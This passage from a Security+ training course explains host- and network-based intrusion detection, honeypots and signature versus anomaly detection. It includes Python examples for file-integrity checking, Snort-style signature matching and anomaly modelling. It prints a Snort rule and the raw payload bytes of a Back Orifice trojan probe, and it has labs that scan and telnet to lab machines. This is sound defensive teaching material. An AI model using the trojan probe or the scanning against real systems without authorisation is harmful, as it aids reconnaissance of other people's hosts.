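"""Tripwire-style file integrity baseline and check (added example)."""
import hashlib
import json
import os
import tempfile


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths):
    """Record content hash and permission bits of each monitored file.
    The baseline must be stored where an intruder cannot rewrite it
    (read-only media or an off-host copy), or the check proves nothing."""
    return {p: {"sha256": sha256_of(p), "mode": os.stat(p).st_mode & 0o7777}
            for p in paths}


def save_baseline(baseline, path):
    with open(path, "w") as f:
        json.dump(baseline, f)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def verify(baseline, expected_to_change=frozenset()):
    """Rerun the hashes and report what differs from the baseline. Files named in
    `expected_to_change` are the tuning exceptions: their content may change
    without an alert, although a permission change still alerts."""
    report = {"modified": [], "perm_changed": [], "missing": []}
    for path, rec in baseline.items():
        if not os.path.exists(path):
            report["missing"].append(path)
            continue
        if (os.stat(path).st_mode & 0o7777) != rec["mode"]:
            report["perm_changed"].append(path)
        if path not in expected_to_change and sha256_of(path) != rec["sha256"]:
            report["modified"].append(path)
    return report


def run_demo():
    """Constructed scenario in a temporary directory: a binary is replaced, a
    config file is made world-writable, a log grows normally, a file is deleted."""
    with tempfile.TemporaryDirectory() as d:
        names = ("ls", "sshd_config", "messages", "wtmp")
        paths = {n: os.path.join(d, n) for n in names}
        for p in paths.values():
            with open(p, "w") as f:
                f.write("original contents\n")
            os.chmod(p, 0o644)          # fixed mode so the demo ignores umask
        store = os.path.join(d, "baseline.json")
        save_baseline(build_baseline(list(paths.values())), store)

        with open(paths["ls"], "w") as f:          # replaced system binary
            f.write("replaced contents\n")
        os.chmod(paths["sshd_config"], 0o666)     # permissions loosened
        with open(paths["messages"], "a") as f:   # normal log growth
            f.write("more log lines\n")
        os.remove(paths["wtmp"])                  # deleted file

        report = verify(load_baseline(store), expected_to_change={paths["messages"]})
        return {k: sorted(os.path.basename(p) for p in v) for k, v in report.items()}


if __name__ == "__main__":
    print(run_demo())
```

The report names exactly the files to restore from backup, which is the benefit the text describes: the administrator does not have to rebuild the whole server. Hashing only infrequently changing files, and listing the log under `expected_to_change`, is the tuning step that keeps routine growth of logs and spool files from drowning real changes in alerts.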

                    Network-based techniques
                    Network-based techniques can also be added to host-based intrusion detection software
                    products. In this situation, the IDS product simply monitors the packets entering and
                    departing the host’s NIC for signs of malicious activity. This solution is designed only
                    to protect the host in question, not to act as a full-featured NIDS product that can protect
                    the entire network segment. Rather than sniff all network traffic, the IDS product simply
                    intercepts received packets before they are passed to the host’s operating system.
                    HIDS products that incorporate NIDS functionality rarely have the same sophisticated
                    attack signatures that dedicated NIDS products have. Most often, HIDS products only
                    provide rudimentary network-based protections.

                    Intercepting requests and monitoring the system
                    Perhaps most significantly, modern HIDS products proactively protect the monitored
                    host by intercepting requests to the operating system for system resources before they
                    are processed. This type of HIDS product integrates with the operating system and is
                    able to validate software calls made into the OS and kernel. Validation of the software
                    calls is accomplished by both generic rules about what processes might have access to
                    resources, and by matching calls to system resources with predefined models
                    (signatures) which identify malicious activity.
                    This feature has far-reaching implications for the security of the protected host. By
                    intercepting calls to the OS before they are processed, HIDS can use active monitoring
                     techniques to preempt attacks before they are executed. Because the operating system
                     controls all system resources, this type of HIDS can:
                        • Prevent files from being modified, deleted, and in some cases being viewed.
                        • Allow access to data files only to a predefined set of processes.
                        • Protect system registry settings from modification.
                        • Prevent critical system services (such as a Web server) from being stopped,
                          modified, or deleted.
                         • Protect settings for users from being modified or deleted, including preventing
                           escalation of rights.
                        • Stop exploitation of application vulnerabilities that might allow remote access to
                          the system or deny access (DoS) to the system.
                        • Prevent the protected server’s application from making unauthorized changes to
                          the system.

HIDS software
Host-based IDS are deployed by installing agent software on the system to be protected.
There are two main types of host-based intrusion detection software: host wrappers
(some of which are thought of as desktop or personal firewalls) and agent-based
software. Either approach is much more effective in detecting trusted-insider attacks
(so-called anomalous activity) than is network-based ID, and both are relatively
effective for detecting attacks from the outside. However, host wrappers do not have the
ability to provide the in-depth, active monitoring measures that agent-based HIDS
products have. Host wrappers tend to be inexpensive and deployable on all machines in
the enterprise, while agent-based applications are more suited for single purpose servers.
Examples of host wrappers are Internet Security Systems’ BlackICE PC Protection and
BlackICE Server Protection (formerly Network ICE and then BlackICE Defender;
www.iss.net).
An example of a full-fledged agent HIDS product is McAfee’s Entercept host-based
IDS product (mcafee.com/us/products/mcafee/host_ips/category.htm).
These products have evaluation versions that can be downloaded and used on a trial
basis.

HIDS active monitoring capabilities
When an attack is flagged, host-based IDS have a similar menu of options to that of
network-based IDS. However, given that the HIDS have access to the host’s operating
system, the HIDS have more power to end attacks with more certainty. Options
commonly used by HIDS agents include:
    • Log the event
    • Alert the administrator
    • Terminate the user login
    • Disable the user account
Logs of an offending event that triggered a response from an agent are obviously useful
for administrators to review when performing a post-mortem on an attack.
Administrators can be alerted through an IDS management console (an application
responsible for receiving alarms from IDS agents), by e-mail, or by SNMP traps sent to
a network management system.
The ability of host-based intrusion detection systems to stop attacks in progress, by
forcing the offending account to log off or disabling it altogether, is what makes host-
based IDS an effective security tool and one that complements network-based IDS and
firewalls. HIDS products with a high degree of OS integration, which can intercept
requests for system resources, can go a step further by denying access to memory,
processor time, and disk space altogether.

                    Advantages of host-based IDS
                    Host-based and network-based IDS products are complementary solutions that should be
                    deployed together to provide defense in depth for network assets. Network-based
                    solutions generally provide an early warning system for attacks, often identifying
                    attacker reconnaissance activities. Host-based intrusion detection solutions have the
                    ability to actually stop compromises while they are in progress. Some of the benefits of
                    HIDS include:
                        • Host-based systems have the ability to verify success or failure of an attack by
                          reviewing extensive HIDS log entries. Network-based IDS products can verify
                          that an attack was attempted, but cannot always provide evidence as to whether
                          or not the attack was successful.
                        • Host-based solutions monitor user and system activities such as file access,
                          changes to permissions and user accounts, software installation, and use of
                          networked resources. This provides detailed information that can be used in a
                          forensic analysis of the attack.
                        • Host-based solutions have the ability to protect against attacks that are not
                          network based, such as when an attacker attempts to gain direct physical access
                          to the host from the keyboard.
                        • Host-based IDS solutions do not rely on any particular network infrastructure,
                          and so are not limited by switched infrastructures, which can make network-
                          based IDS implementations difficult.
                        • Host-based IDS solutions are able to react very quickly to intrusions, by either
                          preventing access to system resources or by identifying a breach immediately
                          after it has occurred.
                        • Because host-based IDS agents are installed on the protected server itself, they
                          require no additional hardware to deploy and no changes to the network
                          infrastructure.
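The file-monitoring benefit above, as an added example that is not code from the course or from any HIDS product it names: a minimal file-integrity check that snapshots SHA-256 digests of a directory tree and reports what an intruder added, removed or modified. The directory tree and the tampering are constructed in a temporary directory.

```python
"""
Added example (not code from the course or from any HIDS product it names):
a minimal file-integrity monitor of the kind a host-based agent uses to
verify whether an attack actually changed anything on the host.  It records
a SHA-256 baseline of a directory tree, re-scans, and reports files that
were added, removed or modified.  The tree and the tampering are constructed.
"""
import hashlib
import os
import tempfile
from typing import Dict, Set


def sha256_file(path: str) -> str:
    """Hash a file in chunks so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> Dict[str, str]:
    """Map every regular file under root (as a '/'-separated relative path)
    to its SHA-256 digest.  This is the 'known good' snapshot."""
    baseline: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def compare(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, Set[str]]:
    """Classify the differences between two snapshots."""
    old, new = set(baseline), set(current)
    return {
        "added": new - old,
        "removed": old - new,
        "modified": {p for p in old & new if baseline[p] != current[p]},
    }


def demo() -> Dict[str, Set[str]]:
    """Constructed scenario: snapshot a small tree, tamper with it, re-scan."""
    with tempfile.TemporaryDirectory() as root:
        original = {
            "bin/login": b"original login binary\n",
            "etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n",
            "var/log/auth.log": b"Accepted password for alice\n",
        }
        for rel, data in original.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(data)
        baseline = build_baseline(root)

        # Simulated compromise: login binary replaced, a new file dropped in
        # bin/, and the authentication log deleted to cover tracks.
        with open(os.path.join(root, "bin", "login"), "wb") as f:
            f.write(b"replaced login binary\n")
        with open(os.path.join(root, "bin", ".hidden"), "wb") as f:
            f.write(b"dropped file\n")
        os.remove(os.path.join(root, "var", "log", "auth.log"))

        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print("%-9s %s" % (kind, sorted(paths)))
```

A real agent would store the baseline off-host (or signed) so that an intruder who gains root cannot simply rewrite it.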

Do it!   B-2:   Discussing host-based IDS
          Questions and answers
          1 What types of activity do host-based IDS (or HIDS) monitor?

            HIDS monitor log files, file checksums, port activity, application requests, and system
            processes for suspicious activity.

          2 In protecting applications, the host sensor agent monitors which areas of
            application activity? (Choose all that apply.)
            A      Program files
            B      Data file
            C      Registry settings
            D      Services
            E      Users
            F      All of the above

          3 HIDS can stop an attack in progress by forcing the offending account to log off or
            disabling it altogether. True or false?

            True

          4 Some benefits of HIDS include:
            A      Can verify success or failure of an attack by reviewing log entries.
            B      Monitor user and system activities.
            C      Protect against attacks that are not network based, such as physical attacks.
            D      Are not limited by switched infrastructures.
            E      React quickly to intrusions.
            F      All of the above.


Topic C: Active and passive detection
                    This topic covers the following CompTIA Security+ exam objective:

                     #     Objective

                     3.4   Differentiate the following types of intrusion detection, be able to explain the concepts of each
                           type, and understand the implementation and configuration of each kind of intrusion detection
                           system
                            • Network Based
                                • Active Detection
                                • Passive Detection
                            • Host Based
                                • Active Detection
                                • Passive Detection




                    Types of intrusion detection systems
Explanation         One way that intrusion detection systems can be categorized is based on their ability to
                    take action when they detect suspicious activity.
                    Passive systems log security events, alert administrators when an attack occurs, and
                    record the offending traffic for analysis, but do not take any preventive action to stop the
                    attack. Active systems have all the logging, alerting, and recording features of passive
                    IDS, with the additional ability to take action against the offending traffic.
                    A couple of options are available for an active system. Active IDS that are able to
                    interoperate with routers and firewalls can upload access control lists to them in order to
                    block the offending traffic at the network edge, as shown in Exhibit 12-2.
                    Exhibit 12-2: NIDS reconfiguration of a router to block attacking packets

This feature is often referred to as IDS shunning or blocking. Another option is for the
active IDS to send a TCP reset to the victim host, using the spoofed IP address of the
attacker, so that the attacking session is torn down. The TCP reset is illustrated in
Exhibit 12-3.
Although active systems might seem far superior because of their ability to block
undesirable traffic, those features must be used with extreme care. Because IDS has not
matured to a point where false positives are very low, enabling shunning features on
IDS can cause legitimate traffic to be inadvertently blocked. Worse, attackers can use
the IDS to create denial-of-service attacks where legitimate users’ IP addresses or
subnets are blocked from entering the network. Active IDS features tend to be used only
in networks where the IDS administrator has carefully tuned the sensor’s behavior to
minimize the number of false positive alarms.
Exhibit 12-3: TCP resets used to stop attacking sessions


Anomaly-based and signature-based IDS
A system has been developed to classify intrusion detection systems based on how they
detect malicious activity. There are two major categories: signature detection (also
known as misuse detection), and anomaly detection.

Signature detection
Signature detection is achieved by creating models of attacks, also called signatures. As
events are monitored, they are compared to a model to determine whether the event
qualifies as an intrusion. For example, most NIDS use signatures to identify attacks. The
signature of a given attack could be a string of characters that appear in the payload of a
packet that is part of the attack.
If you used a protocol analyzer such as SnifferPro to view a Back Orifice port probe
(which an attacker might execute to determine if Back Orifice is running on a potential
victim host), you would see the following data in the packet’s payload:
    CE 63 D1 D2 16 E7 13 CF 38 A5 A5 86 B2 75 4B 99    .c......8....uK.
    AA 32 58                                           .2X

                    Now that you know what the probe looks like, a signature can be created for a NIDS.
                    The following signature definition was created from the above sniffer trace for use with
                    an open source IDS program called Snort:
                        alert UDP $EXTERNAL any -> $INTERNAL 31337 (msg: "IDS397/trojan_trojan-BackOrifice1-scan";
                        content: "|ce63 d1d2 16e7 13cf 38a5 a586|";)
                    The relevant part of the signature definition is the content field. Notice that its
                    twelve hex bytes match the first twelve bytes of the sniffer trace. Snort examines
                    every packet that enters its monitoring NIC and compares the data payload against this
                    signature. If there is an exact match, then Snort alerts the administrator that it has
                    identified an attack using a Back Orifice port scanner. Only attacks, and no benign
                    traffic, should match the signatures; otherwise false alarms are generated.
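The matching described above, as an added example that is neither the course’s nor Snort’s own code: a tiny signature engine that parses a Snort-style rule (the Back Orifice scan rule, with its wrapped lines rejoined) and checks constructed packets against it. Snort itself does much more (offset and depth modifiers, fast pattern matching, stream reassembly); this shows only the core idea, including why a benign packet carrying the same bytes raises a false alarm.

```python
"""
Added example (not the course's or Snort's own code): a minimal signature
engine that parses a Snort-style rule and tests packets against it.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# The Back Orifice probe payload, transcribed from the sniffer trace in the text.
BO_PROBE = bytes.fromhex("CE63D1D216E713CF38A5A586B2754B99AA3258")

# The rule from the text with its wrapped lines rejoined (protocol lowercased,
# as current Snort rule sets write it).
BO_RULE = ('alert udp $EXTERNAL any -> $INTERNAL 31337 '
           '(msg:"IDS397/trojan_trojan-BackOrifice1-scan"; '
           'content:"|ce63 d1d2 16e7 13cf 38a5 a586|";)')


def parse_content(spec: str) -> bytes:
    """Snort content syntax: text outside |...| is literal, inside is hex."""
    parts = spec.split("|")
    if len(parts) % 2 == 0:
        raise ValueError("unbalanced '|' in content %r" % spec)
    out = bytearray()
    for i, part in enumerate(parts):
        if i % 2:                                # odd pieces sit between pipes
            out += bytes.fromhex(part.replace(" ", ""))
        else:
            out += part.encode("latin-1")
    return bytes(out)


@dataclass
class Rule:
    action: str
    proto: str
    dst_port: str                                # a port number or "any"
    content: bytes
    options: Dict[str, str] = field(default_factory=dict)


_HEADER = re.compile(
    r"^(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)\s*\((.*)\)\s*$",
    re.S)
_OPTION = re.compile(r'(\w+)\s*:\s*"([^"]*)"\s*;')


def parse_rule(text: str) -> Rule:
    """Parse 'action proto src sport -> dst dport (opt:"val"; ...)'.
    Address variables such as $EXTERNAL are accepted but not evaluated here."""
    m = _HEADER.match(text.strip())
    if not m:
        raise ValueError("unparseable rule: %r" % text)
    action, proto, _src, _sport, _direction, _dst, dport, body = m.groups()
    options = dict(_OPTION.findall(body))
    if "content" not in options:
        raise ValueError("rule has no content option")
    return Rule(action, proto.lower(), dport, parse_content(options["content"]), options)


def matches(rule: Rule, proto: str, dst_port: int, payload: bytes) -> bool:
    """Substring search, as a Snort content match does when no offset/depth
    modifier restricts it.  That is also why an unrelated packet that happens
    to carry the same bytes produces a false positive."""
    if proto.lower() != rule.proto:
        return False
    if rule.dst_port != "any" and int(rule.dst_port) != dst_port:
        return False
    return rule.content in payload


Packet = Tuple[str, int, bytes]                  # (proto, dst_port, payload)

# Constructed traffic: the probe, a DNS query, an empty datagram, and a benign
# datagram that happens to embed the same twelve bytes (the false-positive case).
SAMPLE_TRAFFIC: List[Packet] = [
    ("udp", 31337, BO_PROBE),
    ("udp", 53, b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
                b"\x07example\x03com\x00\x00\x01\x00\x01"),
    ("udp", 31337, b"\x00" * 20),
    ("udp", 31337, b"backup-chunk:" + BO_PROBE[:12] + b"..."),
]


def run_sensor(rules: List[Rule], traffic: List[Packet]) -> List[Tuple[int, str]]:
    """Return (packet index, msg) for every hit, like a sensor's alert log."""
    alerts = []
    for i, (proto, port, payload) in enumerate(traffic):
        for rule in rules:
            if matches(rule, proto, port, payload):
                alerts.append((i, rule.options.get("msg", "<no msg>")))
    return alerts


if __name__ == "__main__":
    for idx, msg in run_sensor([parse_rule(BO_RULE)], SAMPLE_TRAFFIC):
        print("ALERT packet %d: %s" % (idx, msg))
```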
                    The signature detection method is good at detecting known attacks, but requires the
                    sensor’s database be maintained with current signatures; otherwise, new attacks are not
                    detected. A well-crafted signature nearly always detects the attack it represents, but
                    other packets might also match the signature and generate false alarms. When false
                    positives occur, IDS administrators tune the sensor by carefully determining the cause
                    of the alarm. If the alarm is irrelevant (as it would be if it represented a Windows
                    exploit when the network has only Unix hosts), then the administrator can safely
                    configure the sensor to ignore the signature. If the alarm is required, then the alarm’s
                    context would be modified to prevent a repeat occurrence. Most signature systems are
                    easily customizable, and knowledgeable users can create their own signatures.
                    One problem with signature-based detection techniques is the large number of
                    signatures required to effectively detect misuse. Since a separate signature is needed for
                    each type of attack, a complete database of signatures can contain several hundred
                    entries. The more signatures that each passing packet must be compared against, the
                    slower the NIDS sensor operates. If a sensor operates too slowly, it misses packets and
                    potentially misses attacks as well. Despite this challenge, signature-based intrusion
                    detection is quite popular and works well in practice when configured correctly and
                    monitored frequently.

                    Anomaly detection
                    Anomaly detection takes the opposite position from signature detection. Rather than
                    operate from signatures that define misuse or attacks on the network, anomaly detection
                    creates a model of normal use and looks for activity that does not conform to that
                    model. The difficulty in anomaly detection is in creating the model of normal network
                    activity (or use model). One method of creating the use model selects key statistics
                    about network traffic to recognize normal activity. Unfortunately, too much statistical
                    variation makes models inaccurate, and events classified as anomalies might not always
                    be malicious.
                    For example, a company’s employees might have the habit of returning to their desks
                    and checking their e-mail immediately following a monthly departmental meeting. The
                    resulting spike in activity is not normal for that time of the day or week, so the anomaly-
                    based IDS might label it as a denial-of-service attempt against the mail server.

Another problem with anomaly-based detection is the inability to create a model on a
completely “normal” network. Anomaly detection systems must create a normal use
model by monitoring traffic on the specific network that they will defend. However, the
network might already contain malicious activity, especially if it has an Internet
connection. Any use model created from such a network would implicitly ignore such
preexisting malicious activity, viewing it as “normal.” Anomaly detection systems
aren’t as popular as signature detection systems because of high false alarm rates
created by inaccurate models of normal use.
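The two weaknesses just described, as an added example that is not from the course text: a statistical use model of hourly mail-server request counts (all counts constructed) which flags the benign post-meeting spike as an anomaly, and which, when trained while attack traffic was already present, learns to treat that traffic as normal and misses the spike entirely.

```python
"""
Added example (not from the course text): a statistical anomaly detector of
the kind the text describes, using per-hour e-mail server request counts.
All counts are constructed.
"""
import statistics
from typing import List, Tuple

Model = Tuple[float, float]          # (mean, population standard deviation)


def build_use_model(training_counts: List[int]) -> Model:
    """The 'use model': what normal hourly load looks like."""
    return statistics.mean(training_counts), statistics.pstdev(training_counts)


def threshold(model: Model, k: float = 3.0) -> float:
    """Anything more than k standard deviations above the mean is 'abnormal'."""
    mean, sd = model
    return mean + k * sd


def anomalies(model: Model, observed: List[int], k: float = 3.0) -> List[int]:
    """Indices of observed hours that exceed the model's threshold."""
    limit = threshold(model, k)
    return [i for i, count in enumerate(observed) if count > limit]


# Constructed "clean" training period: roughly 100 mail requests per hour.
CLEAN_TRAINING = [95, 102, 98, 110, 90, 105, 100, 97, 103, 99]

# Same network, but one training hour already carried an attacker's flood
# (600 requests) that nobody noticed when the model was built.
POISONED_TRAINING = CLEAN_TRAINING + [600]

# Observed hours; the 400 is everyone checking e-mail after the monthly meeting.
OBSERVED = [101, 98, 400, 104, 99]


def demo() -> Tuple[List[int], List[int]]:
    """Returns (flags from the clean model, flags from the poisoned model)."""
    clean = anomalies(build_use_model(CLEAN_TRAINING), OBSERVED)
    poisoned = anomalies(build_use_model(POISONED_TRAINING), OBSERVED)
    return clean, poisoned


if __name__ == "__main__":
    clean_flags, poisoned_flags = demo()
    print("clean model flags hours:   ", clean_flags)      # the benign spike
    print("poisoned model flags hours:", poisoned_flags)   # nothing at all
```

With the clean model the threshold is about 116 requests, so the legitimate spike is reported as a possible denial-of-service; with the poisoned model the threshold climbs to about 577, so even a real flood of 500 requests would pass as normal.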

Intrusion detection products
The following table provides a listing of some of the better-known IDS products:

 Company                          Comments

 Aladdin Knowledge Systems        eSafe family provides content security against known and unknown
 ealaddin.com                     security threats.

 Cisco Systems, Inc.              Offers Cisco Guard 5650 and Cisco Traffic Anomaly Detector 5600.
 cisco.com                        These products are aimed to deal with DDoS attacks.

 Computer Associates Intl.        eTrust intrusion detection product is part of the eTrust suite.
 ca.com

 Cylant Technology                CylantSecure product purports to protect against even unknown types
 cylant.com                       of attacks by preventing any anomalous server activity.

 Enterasys Networks Inc.          Dragon family includes network monitors, host-based IDS, and central
 enterasys.com                    console.

 Internet Security Systems Inc.   A major player in the market, provides integrated host- and network-
 iss.net                          based IDS.

 Intrusion.com Inc.               Offers SecureNet family of IDS products.
 intrusion.com

 NFR Security                     Sentivist IDS monitors packet fragments and reassembled packets,
 nfr.com                          and provides customization capabilities.

 Snort                            The home of the well-known open source IDS, Snort.
 snort.org

 Symantec Host IDS                Symantec Host IDS provides prevention, real-time monitoring and
 www.symantec.com                 detection of security breaches.

 Sourcefire, Inc.                 Open source network intrusion detection software, including Intrusion
 sourcefire.com                   Sensor and Snort.

 TripWire Inc.                    Based on the former freeware tool, product detects breaches by
 tripwire.com                     monitoring files for unauthorized changes.

Do it!              C-1:    Discussing active and passive detection
                     Questions and answers
                      1 One way that intrusion detection systems can be categorized is based on their
                        ability to take action when they detect suspicious activity. Passive systems do not
                        take any action to stop or prevent the activity, which could potentially be an
                        attack. True or false?

                        True

                      2 A system has been developed to classify intrusion detection systems based on how
                        they detect malicious activity. What are the major categories?
                        A      Signature detection
                        B      Anomaly detection
                        C      Abnormal detection
                        D      Intrusion penetration
                        E      All of the above

                      3 Which type of IDS can only take logging and alerting types of actions when an
                        attack is identified?
                        A      HIDS
                        B      Active system
                        C      Passive system
                        D      NIDS

                      4 What is a method of detecting intrusion in which the IDS analyze the information
                        they gather and compare it to a database of known attacks?
                        A      IDS
                        B      Host wrappers
                        C      NIDS
                        D      Signature detection

                      5 Which IDS method is operating system-dependent?
                        A      Host-based
                        B      Log-based
                        C      Network-based
                        D      Event-based

6 Which method of IDS is best suited for detecting Trojan horses such as
  BackOrifice?
  A    Host-based
  B    Anomaly-based
  C    Signature-based
  D    Network-based

7 Which method of IDS is capable of real-time detection?
  A    Host-based
  B    Log-based
  C    Network-based
  D    Event-based


Topic D: Honeypots
                    This topic covers the following CompTIA Security+ exam objective:

                     #     Objective

                     3.4   Differentiate the following types of intrusion detection, be able to explain the concepts of each
                           type, and understand the implementation and configuration of each kind of intrusion detection
                           system
                            • Honey Pots




                    Goals of deploying honeypots
 Explanation        In the broadest sense, honeypots are security resources designed with the intent that they
                    will be probed, attacked, or compromised. They are usually programs (although one
                    hardware honeypot product, Smoke Detector, does exist) that simulate one or more
                    unsecured network services. Honeypots are designed to deceive attackers into thinking
                    that the honeypot is a normal host, often with low security, in order to bait them into
                    penetrating it. When the attacker compromises the virtual host provided by the
                    honeypot, all of their actions are logged and recorded, including all keystrokes, changes
                    to the virtual host’s configuration, and uploads of attack tools.
                    Typically, the goal of deploying honeypots is to gather information on hacker
                    techniques, methodology, and tools. Honeypots, then, are usually deployed in two major
                    cases: first, to conduct academic or basic research into hacker methods, and second, to
                    detect attackers inside the organization’s network perimeter. Honeypots have no
                    capability to prevent intrusions; quite the opposite, they are designed to attract
                    attackers just as bees are attracted to honey. Honeypots do have value in reacting to
                    intrusions, because they make the forensic process easier for investigators. Rather than
                    wading through gigabytes of system data in order to find the evidence they need,
                    investigators are directly provided with data on the intruder’s activities by the
                    honeypot software.
                    Although still infrequently encountered in enterprises, honeypots are growing in
                    popularity as a mechanism for increasing security in networks. As can be seen in the
                    following tables, a number of commercial and open source honeypot products have
                    been created. Most organizations have little interest in deploying honeypots for the sake
                    of research, as that research really does not add value to their business operations.
                    (Research honeypots are usually deployed by universities, governments, or research
                    organizations.) When businesses deploy honeypots, the goal is usually to obtain early
                    warning that a malicious hacker has access to the network.

 Commercial honeypot               Comments

 Decoy Server                      Decoy Server provides complete operating systems for
 symantec.com                      attackers to interact with, and has good monitoring, data
                                   collection and notification capabilities.

 Specter                           An easy-to-use commercial honeypot designed to run on
 specter.com                       Windows, Specter can emulate several different operating
                                   systems, monitor every ICMP packet, TCP connection and
                                   UDP datagram, and has a variety of configuration and
                                   notification features.

 PacketDecoy                       A commercial honeypot appliance with extensive detection
 palisadesys.com                   and emulation capabilities.



 Free honeypot                     Comments

 BackOfficer                       A free Windows-based honeypot, BackOfficer is
 nfr.com/resource/backOfficer.php  extremely easy to use and runs on any Windows platform;
                                   a good beginner’s honeypot.

 Deception Toolkit                 A collection of Perl scripts and C source code that emulate
 all.net/dtk/dtk.html              a variety of listening services, DTK’s primary purpose is
                                   to deceive human attackers.

 Honeyd                            Introduced a variety of new concepts, including the ability
 www.honeyd.org                    to monitor millions of unused IPs, IP stack spoofing, and
                                   to simulate hundreds of operating systems at the same
                                   time.

 Honeynets                         Not a program, but an entire network of systems designed
 www.honeynet.org                  to be compromised.

 User Mode Linux                   An open source solution that allows you to run multiple
 user-mode-linux.sourceforge.net   operating systems (and honeypots) at the same time, UML
                                   also has honeypot functionality, including the ability to
                                   capture the attacker’s keystrokes from kernel space; UML
                                   allows you to create an entire honeynet on a single
                                   computer.



Honeypot deployment options
A honeypot can be deployed in a variety of locations in the network, depending on the
goal of the person deploying it. For research purposes, directly connecting a honeypot to
the Internet allows the owner to collect the most data, because hosts exposed to the
Internet are attacked frequently and repeatedly. However, such a deployment offers little
help in securing an organization’s network. When the goal of deploying the honeypot is
to add security to the network, the honeypot should be deployed inside the network
where it can serve to detect attackers and alert security administrators to their presence.
In this case, the honeypot should be placed where it will most likely receive the
attention of an attacker, such as on a server farm or on a DMZ.

                    Honeypot design
                    A few general principles apply when deploying honeypots. Perhaps most importantly,
                    the honeypot must attract, and avoid tipping off, the attacker. This means that the
                    honeypot should appear to have a normal operating system installation to avoid scaring
                    off an intruder who might think the system is under surveillance. The host must also
                    have something of interest for the intruder. Honeypots are often populated with phony
                    data for the attacker to peruse in order to encourage repeat visits during which more data
                    can be gathered.
                    One needs to ensure that a honeypot does not become a staging ground for attacking
                    other hosts, either inside or outside of the firewall. Outside the firewall, the honeypot
                    could be used to attack other organizations, which has implications for liability of those
                    that deploy the honeypot. Inside the firewall, the honeypot could be used to attack real
                    servers and other network resources. However, it is unlikely that an organization would
                    allow the intruder to continue to use a honeypot on the inside for an extended period
                    (allowing him to upload and use attack tools on the honeypot). The goal for such
                    organizations would be to detect and remove the intruder immediately, by closing any
                    security gaps that allowed the intruder access to the network or by removing the
                    employee in the case of an internal attacker.

                    Honeypots, ethics, and the law
                    There has been a debate in the white-hat community whether honeypots are ethical.
                    After all, their goal is to deceive a potential intruder into thinking that the honeypot is a
                    vulnerable host, and to encourage an attack on the honeypot. To some this is not only
                    deception, but also entrapment, much like a police sting operation that induces people to
                    commit crimes which they had no previous intention of committing.
                    The verdict in the security community has been resounding: there is nothing wrong with
                    deceiving an attacker into thinking that he or she is penetrating an actual host, as
                    opposed to an intrusion detection mechanism. After all, it is the intruder that has
                    malicious intent; the organization deploying the honeypot is merely enticing the attacker
                    out into view.
                    In regard to the entrapment argument, it is important to note that the honeypot does not
                    convince one to attack it; it merely appears to be a vulnerable target. To be entrapped,
                    one must be convinced by law enforcement officials to commit the crime. Not only is
                    one not convinced by anyone in particular to attack the honeypot, the honeypot has
                    nothing to do with law enforcement. It is merely a tool used to detect intruders.
                    Honeypots are not a law enforcement tool, and it is doubtful that they could be used as
                    evidence in court.

Do it!   D-1:   Working with a honeypot
          See the classroom setup instructions for the location of the download file.
          Students will have to work in pairs on this activity.

          Here’s how                                  Here’s why
          1 Download and install a copy of            BackOfficer Friendly lures out intruders by
            BackOfficer Friendly according to         emulating a Back Orifice server, and a variety of
            your Instructor’s directions              other services such as FTP, HTTP, and SMTP.

                                                      BackOfficer Friendly is located at
                                                      nfr.com/resource/backOfficer.php. Although this
                                                      is a Windows program, it is sometimes
                                                      erroneously indicated that BackOfficer Friendly
                                                      is for the Unix platform.

          2 In the Taskbar, right-click the
            BackOfficer Friendly icon and
            choose Details…

          3 On the menu bar, choose Options           To view the Options menu.

          4 What types of scans can be                BackOfficer Friendly can listen for Back
            performed with this utility?              Orifice, FTP, Telnet, SMTP, HTTP, POP3 and
                                                      IMAP2.

          5 Select Listen for Telnet

          6 At your partner’s computer, open
            a command window

          7 Enter telnet                              At the command prompt.

          8 Enter o, followed by your                 For example, enter o 192.168.1.4.
            partner’s computer’s IP address

          9 At your own computer, observe             The telnet connection is detected and displayed.
            what happens in the BackOfficer
            Friendly window

         10 In BackOfficer Friendly, choose
            Options

            Enable all scanning options except        In preparation for the next activity.
            Listen for ftp

Do it!   D-2:   Working with SuperScan 3.0
          See the classroom setup instructions for the location of the download file.

          Here’s how                                  Here’s why
          1 Download and install SuperScan 4          SuperScan 4 is a connect-based TCP port
            according to your Instructor’s            scanner, pinger, and hostname resolver. It
            direction                                 enables you to perform ping scans and port
                                                      scans using any IP address range.

          2 With BackOfficer Friendly still           To conduct a scan on your own system.
            active, enter your computer’s IP
            address into the Hostname/IP box

            Click the right arrow next to your        To add the IP address as an address to be
            IP address                                scanned.

          3 Click the blue arrow toward the           To start the scan. You’ll see the results being
            bottom of the window                      displayed in the field at the bottom of the screen.

          4 Switch back to BackOfficer                If the window didn’t already pop up during the
            Friendly                                  scan. The SuperScan activity displays in the
                                                      window.

          5 Close all open windows


Topic E: Incident response
              This topic covers the following CompTIA Security+ exam objective:

               #        Objective

               3.4      Differentiate the following types of intrusion detection, be able to explain the concepts of each
                        type, and understand the implementation and configuration of each kind of intrusion detection
                        system
                         • Incident Response




              Dealing with intrusions
Explanation   Intrusion detection systems and honeypots can spot attacks against your
              organization's information assets, but detection by itself is not enough. Once
              they are deployed, the question becomes: what should be done when these
              systems detect an intrusion? Even if the active response capabilities of the
              IDS stopped the attack in progress, many questions remain. Did the attacker
              gain access to sensitive data? How did the attack penetrate the network? Can
              the attacker do it again? Should law enforcement officials be involved?
